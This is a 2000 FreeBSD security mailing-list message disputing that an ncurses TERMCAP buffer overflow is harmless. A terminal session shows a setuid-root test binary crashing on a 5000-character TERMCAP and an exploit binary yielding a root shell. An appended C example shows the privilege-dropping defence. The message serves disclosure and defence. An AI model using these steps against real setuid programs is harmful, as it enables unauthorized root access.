From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To: "Kris Kennaway"
Subject: Re: freebsd libncurses overflow
Date: Tue, 25 Apr 2000 10:50:42 +0200
Message-ID: <002801bfae93$5b7e69a0$0273b6d4@freebsd.lublin.pl>
List: freebsd-security@freebsd.org

> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.

Sure?
lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54 CET 2000 venglin@lubi.freebsd.lublin.pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386
lubi:venglin:~> cat dupa.c
#include <curses.h>

/* Minimal test program: a setuid binary that calls initscr() while still root. */
int main(void)
{
	initscr();
	return 0;
}
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)

Obviously, *most* binaries are dropping root privileges before using any
ncurses functions.

-- 
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
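The defence the last sentence of the message refers to, written out as an added example (not code from the thread or from FreeBSD's ncurses): drop root back to the real ids and discard TERMCAP before the first ncurses call. It assumes a POSIX system, leaves the actual initscr() call out so it builds without libncurses, and all function names are hypothetical.

```c
#define _DEFAULT_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <grp.h>
#include <sys/types.h>

/* Permanently drop setuid/setgid privilege to the real uid/gid.
 * Returns 0 on success, -1 if the drop could not be made or verified. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    int privileged = (geteuid() != ruid) || (getegid() != rgid);

    if (privileged) {
        /* Order matters: groups, then gid, then uid. Once the uid is
         * dropped the first two calls would no longer be permitted. */
        if (setgroups(1, &rgid) != 0) return -1;
        if (setgid(rgid) != 0) return -1;
        if (setuid(ruid) != 0) return -1;
    }
    /* Verify: effective ids match the real ones and root is not regainable. */
    if (geteuid() != ruid || getegid() != rgid) return -1;
    if (ruid != 0 && setuid(0) == 0) return -1;
    return 0;
}

/* Remove the caller-controlled termcap override before ncurses reads it.
 * Returns 0 once TERMCAP is gone from the environment. */
int scrub_termcap_env(void)
{
    if (unsetenv("TERMCAP") != 0) return -1;
    return getenv("TERMCAP") == NULL ? 0 : -1;
}

/* Self-check mirroring the message: plant a constructed 5000-byte TERMCAP
 * (the equivalent of the perl one-liner), then run both defences.
 * Returns 0 when privileges are dropped and the environment is clean,
 * i.e. the point at which a real program would call initscr(). */
int selfcheck_long_termcap(void)
{
    char big[5001];                      /* constructed sample value */
    memset(big, 'A', 5000);
    big[5000] = '\0';
    if (setenv("TERMCAP", big, 1) != 0) return -1;
    if (drop_privileges() != 0) return -1;
    if (scrub_termcap_env() != 0) return -1;
    return 0;                            /* initscr() would follow here */
}
```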